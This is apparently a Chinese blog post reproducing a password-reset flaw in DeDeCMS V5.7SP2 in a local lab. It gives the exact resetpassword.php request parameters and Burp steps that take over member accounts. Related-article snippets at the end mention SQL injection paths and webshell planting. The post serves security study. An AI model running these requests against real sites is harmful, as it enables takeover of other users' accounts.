DeDeCMS前台任意用户密码修改漏洞复现

DeDeCMS 前台任意用户密码修改漏洞复现与分析
最新推荐文章于 2025-02-26 13:43:26 发布
原创 最新推荐文章于 2025-02-26 13:43:26 发布 · 3.2k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全

本文详细介绍了DeDeCMS V5.7SP2版本的一个前台任意用户密码修改漏洞,该漏洞允许攻击者无需安全问题即可修改未设置安全问题的账户密码。通过复现环境的搭建、安装、登录和注册过程,以及使用Burp Suite进行抓包和密码修改,展示了漏洞的具体利用步骤。此漏洞影响限制为仅限前台账户且账户未设置安全问题。

一、漏洞概述

1.漏洞简介

织梦内容管理系统(DedeCms)的前台任意用户密码修改漏洞,被Seebug 漏洞平台[3]收录该漏洞,漏洞编号为 SSV-97074。

2.漏洞限制 

1、 只影响前台账户

2、 只能修改未设置安全问题的账户

3.影响版本

DeDeCMSV5.7SP2 正式版(2018-01-09)

二、漏洞复现

1.复现环境

PHP 5.6

DeDeCMSV5.7SP2 正式版(2018-01-09)

2.复现过程及结果

(一)搭建网站,这里用的是phpstudy

 注意:DeDeCMSV5.7SP2 里面的文件一定要放在它的根目录下

 

 

 否则安装DeDeCMS时会出现打不开的情况会出现打不开的情况

 (二)安装DeDeCMS

地址栏输入 域名/uploads/install/index.php进入安装页面

如:www.iwantfff.com/uploads/install/index.php 

 点击继续

 数据库的密码在phpstudy查看

 

 

如果你做不成功第二次想再做过,就会显示数据库已存在,但是这个不用管,没有影响的。

 (三)登录,注册

(1)登陆后台,打开会员功能

 

 (2)注册一个没有安全问题的会员

 登录管理员账号,可以看到已经注册好的会员 。

 (四)burp抓包

(1)输入 

域名/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

如:

www.iwantfff.com/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

抓包得key,这是一会儿修改密码的临时验证码验证码。

 (2)修改密码

输入 :域名/member/resetpassword.php?dopost=getpasswd&id=2

如:www.iwantfff.com/member/resetpassword.php?dopost=getpasswd&id=2

 修改成功。

 

Coffilater
关注
DedeCMS存在的安全漏洞及编程解决方案“
HackSquad的博客
10-03 797
本文介绍了DedeCMS中常见的安全漏洞,包括SQL注入漏洞、文件上传漏洞和跨站脚本漏洞,并提供了相应的编程解决方案。在开发和使用DedeCMS时时,务必注意安全性,并采取适当的措施来防止这些漏洞的利用。在本文中,我们将详细介绍DedeCMS常见的安全漏洞,并提供相应的编程解决方案。为了防止文件上传漏洞,应该对上传的文件进行严格的验证和过滤。可以检查文件的扩展名、文件类型、文件大小等,并将上传的文件存储在一个独立的目录中,避免直接执行上传文件。为了防止跨站脚本漏洞,应该对用户输入的内容进行适当的转义。
漏洞复现DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
李同學的安全圈
05-31 4469
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改 漏洞复现(包括环境搭建)
aarong的博客
11-22 5425
目录一、漏洞概述二、环境搭建三、漏洞复现 一、漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2 漏洞限制 ​ 1、 只影响前台账户 ​ 2、 只能修改
DedeCms织梦系统漏洞复现
LIU6636LIU的博客
03-13 3381
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
漏洞复现DeDeCMS织梦
qq_53188113的博客
11-25 3264
目录 一、复现环境 二、复现过程及环境 一、复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 二、复现过程及环境 安装 DeDeCMS 首先,利用PHPstudy安装环境 点击网站,进入后再点击创建网站,然后填写域名,可根据自己的需要来填写 回到文件夹,打开 DeDeCMS所在文件夹的uploads路径,把其下所有的文件复制到 studypro文件夹的www目录中即可 域名/install/ 进入安装页面 填写好..
DeDeCMS前台任意用户密码修改漏洞复现.pdf
12-16
在本文档中,我们关注的是一个特定的安全漏洞,即DeDeCMS前台任意用户密码修改漏洞,该漏洞允许攻击者在满足特定条件的情况下,无需知道用户安全问题就能重置任意用户密码。 该漏洞首先被Seebug漏洞平台收录,...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
yghlqgt的博客
10-18 1366
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现 需要的用到的软件: phpstudy burpsuite 要完成该漏洞复现我们要完成如下几个步骤。 一、搭建网站 想要复现漏洞,首先需要搭建好环境,第一步就是要求我们搭建好这个有漏洞的网站, 首先下载好网页的代码:DeDeCMSV5.7SP2 正式版(2018-01-09) 然后要我们可以使用一些搭建网站的工具来搭建这个网站,我是用的工具是phpstudy,具体搭建步骤如下: 将下载DeDeCMSV5.7SP2 正式版(20
织梦任意前台密码修改漏洞复现
m0_57851357的博客
12-12 2890
一、背景 织梦内容管理系统(DedeCms)以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 二、复现过程 所需环境: PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 过...
dedecms会员注册注入漏洞
weixin_33912453的博客
03-30 428
一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入三、爆用户:/member/ajax_membergroup.php?action=post&memb...
DeDeCMS漏洞
weixin_53198216的博客
08-03 388
4.在生成下选择更新主页HTML,将主页位置后缀改为php,首页模式选择生成静态,再点击更新主页HTML。2.选择模板下的默认模板管理,找到index.htm。7.打开蚁剑,输入网址和密码点击测试连接,显示成功。6.复制到地址栏访问,没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。
dedeCMS前台用户密码重置漏洞复现与分析
看不尽的尘埃——博客
11-19 669
版本:5.7 分析写在了后面 详细过程 安装     由于dede在安装完成后没开启会员注册,所以安装完成后首先进入后台,开启网站会员注册。  开启后,注册一个test账号,密码为123456。需要注意的是不要设置安全问题,才可以复现漏洞。  注册完成  进入后台查看test用户的mid值  ...
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1)
午夜安全
11-17 4502
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms的网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,提示删除install/install_lock.txt。删除后,可以正常访问,之后按照提示安装完成即可。安装完成后,访问首页。...
dedecms织梦上传漏洞怎么修复
09-05 345
漏洞DedeCMS V5.7 SP2正式版(2018-01-09) 已经修复过,已经你的织梦程序已经是这个版本的话,可以忽略以下修复教程,不放心的可以打开文件对比一下。自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示。打开 /include/uploadsafe.inc.php 找到 40至43行。dedecms过滤逻辑不严导致上传漏洞dedecms上传漏洞
任意密码登录——密码找回漏洞
记录并分享学习安全的知识点..
04-15 1576
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞存在的点 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解。 密码找回凭证可从客户端直接获取。 密码找回凭证在页面中可以直接获取。 密码找回凭证存并非只是与单个用户并绑定的问题。 密码找回凭证存并非只是与单个用户并绑定的问题。 用户找回密码的邮箱地址或者手机号码被修改。 在最后提交修改密码处的逻辑错误。 二、漏洞复现 (一)密码找回凭证存放在cookie中 1.点击.
深入剖析逻辑漏洞任意密码重置与任意账户登录
最新发布
m0_57836225的博客
02-26 1303
任意账户登录漏洞是指由于系统的逻辑错误,使得攻击者能够以任意用户的身份登录系统。逻辑漏洞的危害不容小觑,它可能导致用户信息泄露、账户被盗用等严重后果。为了防范这些漏洞,开发者在设计和开发系统时,应严格验证密码修改和登录的各种凭证,避免在前端进行关键验证,确保 token 等关键信息的随机性和不可预测性,同时定期更新系统默认口令,加强对用户安全教育,提高用户安全意识,避免使用简单、易猜测的密码
Dedecms会员中心注入漏洞
weixin_33721344的博客
03-30 630
详细说明: member/buy_action.php   require_once(dirname(__FILE__)."/config.php");   CheckRank(0,0);   $menutype = 'mydede';   $menutype_son = 'op';   require_once DEDEINC.'/dedetemplate.class.ph...
DeDeCMS漏洞复现(基于PHP搭建)
2301_79638144的博客
11-07 1856
dedecms平台搭建及漏洞复现
dedecms漏洞复现
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞复现过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值